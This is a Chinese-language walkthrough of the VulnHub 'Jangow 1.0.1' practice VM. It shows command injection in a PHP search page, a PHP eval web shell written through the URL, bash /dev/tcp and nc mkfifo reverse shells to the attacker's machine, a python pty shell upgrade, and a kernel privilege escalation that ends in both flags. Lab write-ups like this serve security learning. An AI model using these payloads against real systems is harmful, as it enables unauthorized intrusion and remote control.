下载地址
- jangow-01-1.0.1.ova (Size: 828 MB)
- Download (Mirror): https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova
- Download (Torrent): https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent ( Magnet)
题目描述
Difficulty: easy
The secret to this box is enumeration! Inquiries jangow2021@gmail.com
This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0
靶机测试
首先进入靶机,可以发现有一个site文件夹
点进site可以发现是一个web页面
页面右上角Buscar的url为:
http://192.168.162.156/site/busque.php?buscar=
测试一下发现居然可以直接命令执行
http://192.168.162.156/site/busque.php?buscar=ls
whoami一下可以得知权限是www-data权限,不是root权限
尝试读取一下busque.php文件,由于存在空格,浏览器url上直接访问有点问题。burpsuite抓包一下做个测试
发现busque.php的内容就是一system函数命令执行,估计这题就是直接把入口点告诉我们了,关键应该是需要提权之类的。
<?php system($_GET['buscar']); ?>
可以直接system执行命令的话,那就先写个shell
http://192.168.162.156/site/busque.php?buscar=echo%20%27%3C?php%20@eval($_POST[%27yue7%27]);%20?%3E%27%20%3E%3E%20yue7.php
再次ls一下即可发现写入成功
尝试用蚁剑连接,可以发现成功连接
在/home/jangow01/user.txt下发现第一个flag
d41d8cd98f00b204e9800998ecf8427e
尝试进入root目录,发现没有权限,之后应该就是做一个提权了。
进入终端,利用uname -a可以得到服务器的系统版本
去kali上搜索一下漏洞库,可以发现有一个本地提权的exp,而且版本也在漏洞范围之内
直接讲exp下载下来
之后尝试传入服务器内,直接传到web目录下,利用gcc进行编译
编译成功,但是直接运行没有反应,看来需要一个可以获取终端的shell,得尝试将shell反弹出去,通过测试发现服务器内自带有python3和php。但是貌似权限都不大够,没法反弹成功,尝试bash -i >& /dev/tcp/192.168.162.188/7777 0>&1
也反弹不了,估计都是权限有问题。
那就尝试写个php文件反弹,有点莫名其妙为什么只有443端口可以,其他端口就不行。
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.162.188 443 >/tmp/f');?>
php -r 'system("/bin/bash");'
开不了shell,尝试用python的
python3 -c 'import pty;pty.spawn("/bin/bash")'
python就成功开启了一个ttyshell
利用ttyshell再次尝试运行之前编译好的提权exp,可以发现运行成功,获得了root权限
之后就去root目录看看有没有东西,可以发现cd目录下有一个proof.txt,cat一下成功获得第二个flag
da39a3ee5e6b4b0d3255bfef95601890afd80709